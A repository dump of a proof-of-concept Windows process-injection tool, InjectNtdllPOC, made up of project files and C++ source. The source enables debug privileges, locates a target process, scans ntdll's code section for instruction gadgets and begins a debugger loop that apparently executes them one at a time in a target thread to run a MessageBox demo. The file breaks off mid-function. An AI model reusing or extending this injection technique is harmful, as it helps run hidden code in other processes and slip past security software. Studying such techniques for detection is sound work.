├── .gitattributes
├── .gitignore
├── InjectNtdllPOC.sln
├── InjectNtdllPOC
├── InjectNtdllPOC.vcxproj
├── InjectNtdllPOC.vcxproj.filters
└── Source.cpp
├── Media
└── poc.gif
└── README.md
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------
/InjectNtdllPOC.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31729.503
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectNtdllPOC", "InjectNtdllPOC\InjectNtdllPOC.vcxproj", "{9D513206-4A9C-4CB7-83F7-87984C05BD79}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Debug|x64.ActiveCfg = Debug|x64
17 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Debug|x64.Build.0 = Debug|x64
18 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Debug|x86.ActiveCfg = Debug|Win32
19 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Debug|x86.Build.0 = Debug|Win32
20 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Release|x64.ActiveCfg = Release|x64
21 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Release|x64.Build.0 = Release|x64
22 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Release|x86.ActiveCfg = Release|Win32
23 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {D73B2C18-B48C-46A9-B1EF-31C59F0D48C3}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/InjectNtdllPOC/InjectNtdllPOC.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {9d513206-4a9c-4cb7-83f7-87984c05bd79}
25 | InjectNtdllPOC
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 | RequireAdministrator
112 |
113 |
114 |
115 |
116 | Level3
117 | true
118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
119 | true
120 |
121 |
122 | Console
123 | true
124 |
125 |
126 |
127 |
128 | Level3
129 | true
130 | true
131 | true
132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
133 | true
134 |
135 |
136 | Console
137 | true
138 | true
139 | true
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
--------------------------------------------------------------------------------
/InjectNtdllPOC/InjectNtdllPOC.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/InjectNtdllPOC/Source.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | #define FLAG_EAX 0x00000001
8 | #define FLAG_EBX 0x00000002
9 | #define FLAG_ECX 0x00000004
10 | #define FLAG_EDX 0x00000008
11 | #define FLAG_EDI 0x00000010
12 | #define FLAG_ESI 0x00000020
13 | #define FLAG_CALL 0x00000040
14 |
15 | struct InstructionEntryStruct
16 | {
17 | const char* pLabel;
18 |
19 | BYTE bInstruction[16];
20 | DWORD dwInstructionLength;
21 |
22 | DWORD dwInstructionAddr;
23 |
24 | DWORD dwEax;
25 | DWORD dwEbx;
26 | DWORD dwEcx;
27 | DWORD dwEdx;
28 | DWORD dwEdi;
29 | DWORD dwEsi;
30 | DWORD dwInstructionFlags;
31 | };
32 |
33 | DWORD dwGlobal_CurrInstruction = 0;
34 | CONTEXT Global_OrigContext;
35 | DWORD targetThread = 0;
36 | HANDLE hTargetThread;
37 |
38 | DWORD FindProcessId(const std::wstring& processName)
39 | {
40 | PROCESSENTRY32 processInfo;
41 | processInfo.dwSize = sizeof(processInfo);
42 |
43 | HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
44 | if (processesSnapshot == INVALID_HANDLE_VALUE) {
45 | return 0;
46 | }
47 |
48 | Process32First(processesSnapshot, &processInfo);
49 | if (!processName.compare(processInfo.szExeFile))
50 | {
51 | CloseHandle(processesSnapshot);
52 | return processInfo.th32ProcessID;
53 | }
54 |
55 | while (Process32Next(processesSnapshot, &processInfo))
56 | {
57 | if (!processName.compare(processInfo.szExeFile))
58 | {
59 | CloseHandle(processesSnapshot);
60 | return processInfo.th32ProcessID;
61 | }
62 | }
63 |
64 | CloseHandle(processesSnapshot);
65 | return 0;
66 | }
67 |
68 | BOOL AdjustPrivileges() {
69 | BOOL bRet = FALSE;
70 | HANDLE hToken = NULL;
71 | LUID luid = { 0 };
72 |
73 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
74 | {
75 | if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
76 | {
77 | TOKEN_PRIVILEGES tokenPriv = { 0 };
78 | tokenPriv.PrivilegeCount = 1;
79 | tokenPriv.Privileges[0].Luid = luid;
80 | tokenPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
81 |
82 | bRet = AdjustTokenPrivileges(hToken, FALSE, &tokenPriv, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
83 | }
84 | }
85 |
86 | return bRet;
87 | }
88 |
89 | InstructionEntryStruct Global_InstructionList[] =
90 | {
91 | // allocate 1kb buffer for messagebox title using GlobalAlloc
92 | { "push ecx", { 0x51 }, 1, 0, 0, 0, 1024, 0, 0, 0, FLAG_ECX },
93 | { "push ecx", { 0x51 }, 1, 0, 0, 0, GMEM_FIXED, 0, 0, 0, FLAG_ECX },
94 | { "call eax ; (GlobalAlloc)", { 0xFF, 0xD0 }, 2, 0, (DWORD)GlobalAlloc, 0, 0, 0, 0, 0, FLAG_EAX | FLAG_CALL },
95 |
96 | // set messagebox title to "www.x86matthew.com"
97 | { "mov ebx, eax", { 0x8B, 0xD8 }, 2, 0, 0, 0, 0, 0, 0, 0, 0 },
98 | { "mov byte ptr [ebx], dl ; character: 'I' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'I', 0, 0, FLAG_EDX },
99 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
100 | { "mov byte ptr [ebx], dl ; character: 't' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 't', 0, 0, FLAG_EDX },
101 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
102 | { "mov byte ptr [ebx], dl ; character: ' ' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, ' ', 0, 0, FLAG_EDX },
103 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
104 | { "mov byte ptr [ebx], dl ; character: 'w' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'w', 0, 0, FLAG_EDX },
105 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
106 | { "mov byte ptr [ebx], dl ; character: 'o' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'o', 0, 0, FLAG_EDX },
107 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
108 | { "mov byte ptr [ebx], dl ; character: 'r' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'r', 0, 0, FLAG_EDX },
109 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
110 | { "mov byte ptr [ebx], dl ; character: 'k' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'k', 0, 0, FLAG_EDX },
111 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
112 | { "mov byte ptr [ebx], dl ; character: 's' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 's', 0, 0, FLAG_EDX },
113 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
114 | { "mov byte ptr [ebx], dl ; (null) ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, '\0', 0, 0, FLAG_EDX },
115 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
116 |
117 | // store messagebox title ptr in edi register
118 | { "mov edi, eax", { 0x8B, 0xF8 }, 2, 0, 0, 0, 0, 0, 0, 0, 0 },
119 |
120 | // allocate 1kb buffer for messagebox text using GlobalAlloc
121 | { "push ecx", { 0x51 }, 1, 0, 0, 0, 1024, 0, 0, 0, FLAG_ECX },
122 | { "push ecx", { 0x51 }, 1, 0, 0, 0, GMEM_FIXED, 0, 0, 0, FLAG_ECX },
123 | { "call eax ; (GlobalAlloc)", { 0xFF, 0xD0 }, 2, 0, (DWORD)GlobalAlloc, 0, 0, 0, 0, 0, FLAG_EAX | FLAG_CALL },
124 |
125 | // set messagebox text to "Maff1t"
126 | { "mov ebx, eax", { 0x8B, 0xD8 }, 2, 0, 0, 0, 0, 0, 0, 0, 0 },
127 | { "mov byte ptr [ebx], dl ; character: 'n' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'n', 0, 0, FLAG_EDX },
128 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
129 | { "mov byte ptr [ebx], dl ; character: 't' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 't', 0, 0, FLAG_EDX },
130 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
131 | { "mov byte ptr [ebx], dl ; character: 'd' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'd', 0, 0, FLAG_EDX },
132 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
133 | { "mov byte ptr [ebx], dl ; character: 'l' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'l', 0, 0, FLAG_EDX },
134 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
135 | { "mov byte ptr [ebx], dl ; character: 'l' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'l', 0, 0, FLAG_EDX },
136 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
137 | { "mov byte ptr [ebx], dl ; (null) ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, '\0', 0, 0, FLAG_EDX },
138 | { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
139 |
140 | // call MessageBoxA
141 | { "push ecx", { 0x51 }, 1, 0, 0, 0, MB_OK, 0, 0, 0, FLAG_ECX },
142 | { "push edi", { 0x57 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
143 | { "push eax", { 0x50 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
144 | { "push ecx", { 0x51 }, 1, 0, 0, 0, 0, 0, 0, 0, FLAG_ECX },
145 | { "call eax ; (MessageBoxA)", { 0xFF, 0xD0 }, 2, 0, (DWORD)MessageBoxA, 0, 0, 0, 0, 0, FLAG_EAX | FLAG_CALL },
146 | };
147 |
148 | DWORD GetModuleCodeSection(DWORD dwModuleBase, DWORD* pdwCodeSectionStart, DWORD* pdwCodeSectionLength)
149 | {
150 | IMAGE_DOS_HEADER* pDosHeader = NULL;
151 | IMAGE_NT_HEADERS* pNtHeader = NULL;
152 | IMAGE_SECTION_HEADER* pCurrSectionHeader = NULL;
153 | char szCurrSectionName[16];
154 | DWORD dwFound = 0;
155 | DWORD dwCodeSectionStart = 0;
156 | DWORD dwCodeSectionLength = 0;
157 |
158 | // get dos header ptr (start of module)
159 | pDosHeader = (IMAGE_DOS_HEADER*)dwModuleBase;
160 | if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
161 | {
162 | return 1;
163 | }
164 |
165 | // get nt header ptr
166 | pNtHeader = (IMAGE_NT_HEADERS*)((BYTE*)pDosHeader + pDosHeader->e_lfanew);
167 | if (pNtHeader->Signature != IMAGE_NT_SIGNATURE)
168 | {
169 | return 1;
170 | }
171 |
172 | // loop through all sections
173 | for (DWORD i = 0; i < pNtHeader->FileHeader.NumberOfSections; i++)
174 | {
175 | // get current section header
176 | pCurrSectionHeader = (IMAGE_SECTION_HEADER*)((BYTE*)pNtHeader + sizeof(IMAGE_NT_HEADERS) + (i * sizeof(IMAGE_SECTION_HEADER)));
177 |
178 | // pCurrSectionHeader->Name is not null terminated if all 8 characters are used - copy it to a larger local buffer
179 | memset(szCurrSectionName, 0, sizeof(szCurrSectionName));
180 | memcpy(szCurrSectionName, pCurrSectionHeader->Name, sizeof(pCurrSectionHeader->Name));
181 |
182 | // check if this is the main code section
183 | if (strcmp(szCurrSectionName, ".text") == 0)
184 | {
185 | // found code section
186 | dwFound = 1;
187 | dwCodeSectionStart = dwModuleBase + pCurrSectionHeader->VirtualAddress;
188 | dwCodeSectionLength = pCurrSectionHeader->SizeOfRawData;
189 |
190 | break;
191 | }
192 | }
193 |
194 | // ensure the code section was found
195 | if (dwFound == 0)
196 | {
197 | return 1;
198 | }
199 |
200 | // store values
201 | *pdwCodeSectionStart = dwCodeSectionStart;
202 | *pdwCodeSectionLength = dwCodeSectionLength;
203 |
204 | return 0;
205 | }
206 |
207 | DWORD ScanForInstructions()
208 | {
209 | DWORD dwInstructionCount = 0;
210 | DWORD dwCurrSearchPos = 0;
211 | DWORD dwBytesRemaining = 0;
212 | DWORD dwFoundAddr = 0;
213 | DWORD dwCodeSectionStart = 0;
214 | DWORD dwCodeSectionLength = 0;
215 |
216 | // calculate instruction count
217 | dwInstructionCount = sizeof(Global_InstructionList) / sizeof(Global_InstructionList[0]);
218 |
219 | // find ntdll code section range
220 | if (GetModuleCodeSection((DWORD)GetModuleHandleW(L"ntdll.dll"), &dwCodeSectionStart, &dwCodeSectionLength) != 0)
221 | {
222 | return 1;
223 | }
224 |
225 | // scan for instructions
226 | for (DWORD i = 0; i < dwInstructionCount; i++)
227 | {
228 | // check if an address has already been found for this instruction
229 | if (Global_InstructionList[i].dwInstructionAddr != 0)
230 | {
231 | continue;
232 | }
233 |
234 | // find this instruction in the ntdll code section
235 | dwCurrSearchPos = dwCodeSectionStart;
236 | dwBytesRemaining = dwCodeSectionLength;
237 | dwFoundAddr = 0;
238 | for (;;)
239 | {
240 | // check if the end of the code section has been reached
241 | if (Global_InstructionList[i].dwInstructionLength > dwBytesRemaining)
242 | {
243 | break;
244 | }
245 |
246 | // check if the instruction exists here
247 | if (memcmp((void*)dwCurrSearchPos, (void*)Global_InstructionList[i].bInstruction, Global_InstructionList[i].dwInstructionLength) == 0)
248 | {
249 | dwFoundAddr = dwCurrSearchPos;
250 | break;
251 | }
252 |
253 | // update search indexes
254 | dwCurrSearchPos++;
255 | dwBytesRemaining--;
256 | }
257 |
258 | // ensure the opcode was found
259 | if (dwFoundAddr == 0)
260 | {
261 | printf("Error: Instruction not found in ntdll: '%s'\n", Global_InstructionList[i].pLabel);
262 |
263 | return 1;
264 | }
265 |
266 | // store address
267 | Global_InstructionList[i].dwInstructionAddr = dwFoundAddr;
268 |
269 | // copy this instruction address to any other matching instructions in the list
270 | for (DWORD ii = 0; ii < dwInstructionCount; ii++)
271 | {
272 | // check if the instruction lengths match
273 | if (Global_InstructionList[ii].dwInstructionLength == Global_InstructionList[i].dwInstructionLength)
274 | {
275 | // check if the instruction opcodes match
276 | if (memcmp(Global_InstructionList[ii].bInstruction, Global_InstructionList[i].bInstruction, Global_InstructionList[i].dwInstructionLength) == 0)
277 | {
278 | // copy instruction address
279 | Global_InstructionList[ii].dwInstructionAddr = Global_InstructionList[i].dwInstructionAddr;
280 | }
281 | }
282 | }
283 | }
284 |
285 | return 0;
286 | }
287 |
288 | void DebuggerMainLoop() {
289 | DEBUG_EVENT DBEvent;
290 | LPDEBUG_EVENT DebugEv = &DBEvent;
291 | CONTEXT currentContext;
292 | for (;;)
293 | {
294 | WaitForDebugEvent(DebugEv, INFINITE);
295 | if (targetThread == DebugEv->dwThreadId)
296 |
297 | if (DebugEv->dwDebugEventCode == CREATE_THREAD_DEBUG_EVENT) {
298 | printf("This event is fired for every thread resumed %d\n", DebugEv->dwThreadId);
299 | }
300 |
301 |
302 | // Check if the event comes from the monitored thread
303 | // and if the exeception is STEP or BREAKPOINT
304 | if (DebugEv->dwDebugEventCode != EXCEPTION_DEBUG_EVENT) {
305 | ContinueDebugEvent(DebugEv->dwProcessId, DebugEv->dwThreadId, DBG_CONTINUE);
306 | continue;
307 | }
308 |
309 | if (targetThread == 0) {
310 | targetThread = DebugEv->dwThreadId;
311 | hTargetThread = OpenThread(THREAD_ALL_ACCESS, false, targetThread);
312 | GetThreadContext(hTargetThread, &Global_OrigContext);
313 | }
314 |
315 | // Now we know that the target thread has raised a breakpoint/single-step exception
316 | InstructionEntryStruct* pCurrInstruction = NULL;
317 | hTargetThread = OpenThread(THREAD_ALL_ACCESS, false, targetThread);
318 | if (!GetThreadContext(hTargetThread, ¤tContext)) {
319 | printf("Unable to get thread context");
